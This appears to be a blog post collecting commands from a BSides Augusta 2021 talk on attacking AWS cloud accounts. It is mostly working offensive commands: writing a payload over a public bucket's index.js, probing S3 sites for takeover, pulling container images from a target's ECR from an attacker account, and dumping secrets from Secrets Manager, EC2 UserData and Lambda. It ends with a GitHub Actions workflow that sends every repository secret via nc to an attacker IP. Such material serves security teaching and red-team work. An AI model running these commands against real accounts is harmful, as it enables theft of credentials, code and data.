This post is the notes and commands from by presentation “The Cloud is Dark and Full of Terrors” from BSides Augusta 2021. Video is available on YouTube. Slides are available here
Authorize global access via RDP to an instance
aws ec2 authorize-security-group-ingress --port 3389 --cidr 0.0.0.0/0 --FIXME
AWS S3 commands
Anonymous list of an S3 bucket:
aws s3 ls $bucket --no-sign-request
curl http://$bucket.s3.amazonaws.com/
Listing an S3 Bucket as any AWS Customer
aws s3 ls $bucket --profile EVILACCOUNT
Download a specific object
curl https://$bucket.s3.amazonaws.com/$key
Anonmyous write to a publicly writable bucket
aws s3 cp --no-sign-request payload.js s3://$bucket/index.js
curl -X PUT -T "payload.js" \
-H "Host: $bucket.s3.amazonaws.com" \
-H "x-amz-acl:public-read" \
"https://$bucket.s3.amazonaws.com/index.js"
Determine the AWS Account ID which owns a bucket
Find S3 Websites you can takeover
LIST=`aws route53 list-hosted-zones --output text --query HostedZones[].Id`
for id in $LIST ; do
aws route53 list-resource-record-sets --hosted-zone-id $id \
--query "ResourceRecordSets[].[AliasTarget.DNSName,Name]" \
--output text | grep s3
done
Public ECR Registry
To Authenticate to a target AWS Account from an attacker account:
ECRPASS=$(aws ecr get-login-password --profile $EVILACCOUNT )
echo $ECRPASS | docker login --username AWS --password-stdin $TARGETACCOUNTID.dkr.ecr.$REGION.amazonaws.com
Login is successful!
List images:
aws ecr list-images --repository-name melisandre --profile $EVILACCOUNT --registry-id $TARGETACCOUNTID
To Exfiltrate the container for local inspection:
docker save $TARGETACCOUNTID.dkr.ecr.$REGION.amazonaws.com/$IMAGE
Policy to make an ECR public:
{
"Version": "2008-10-17",
"Statement":
[
{
"Sid": "allow public pull",
"Effect": "Allow",
"Principal": "*",
"Action": ["ecr:*"]
}
]
}
Command to apply the above policy
aws ecr set-repository-policy --repository-name melisandre --policy-text file://ecr-policy.json
How to enumerate ECR Policies:
aws ecr get-repository-policy --registry-id $TARGETACCOUNTID --repository-name melisandre --profile EVILACCOUNT
Public AWS ElasticSearch Clusters
Elastic Search Endpoints look like:
https://$CUSTOMERDEFINED-$RANDOM.us-east-1.es.amazonaws.com/
From an ES perspective, you can Curl the endpoint and see if it responds.
curl https://$ENDPOINT/ | jq .
{ ...
"tagline" : "You Know, for Search"
}
Next get the list of indices to see if anything bad looks like it’s there:
curl https://$ENDPOINT/_aliases?pretty=true
Finally based on that list, you can search an index
curl https://$ENDPOINT/_search?pretty=true
Enumerate Snapshots and AMIs
aws ec2 describe-snapshots --owner-ids $TARGETACCOUNTID --profile $EVILACCOUNT --region $REGION
aws ec2 describe-images --owners $TARGETACCOUNTID --profile $EVILACCOUNT --region $REGION
Secrets Enumeration – EC2 UserData
LIST=`aws ec2 describe-instances \
--query Reservations[].Instances[].InstanceId --output text`
for i in $LIST ; do
aws ec2 describe-instance-attribute --instance-id $i --attribute userData \
--output text --query UserData | base64 --decode > $i-USERDATA.txt
done
Secrets Enumeration – Secrets Manager
LIST=`aws secretsmanager list-secrets
--query SecretList[].Name --output text`
for secret_name in $LIST; do
echo "$secret_name: "
aws secretsmanager get-secret-value --secret-id $secret_name --query SecretString --output text
done
Exfiltrate Lambda Code
LIST=`aws lambda list-functions --query Functions[].FunctionName --output text`
for f in $LIST ; do
URL=`aws lambda get-function --function-name $f --output text --query Code.Location `
curl -o $f.zip "$URL"
done
Find Secrets in Lambda Envars!!
LIST=`aws lambda list-functions --query Functions[].FunctionName --output text`
for f in $LIST ; do
aws lambda get-function --function-name $f --query Configuration.Environment
done
Secrets Enumeration – CloudFormation
aws cloudformation describe-stacks --query Stacks[].Parameters
aws cloudformation describe-stacks --query Stacks[].Outputs
Exfiltrate secrets from GitHub Secrets
name: Action run on a PR
on: [push]
jobs:
sync-files:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v1
- name: Exposure
run: |
echo "here are some sekrets haxored courtesy of $GITHUB_ACTOR: ${{ toJson(secrets) }}" | nc -w 3 <your_ip> 80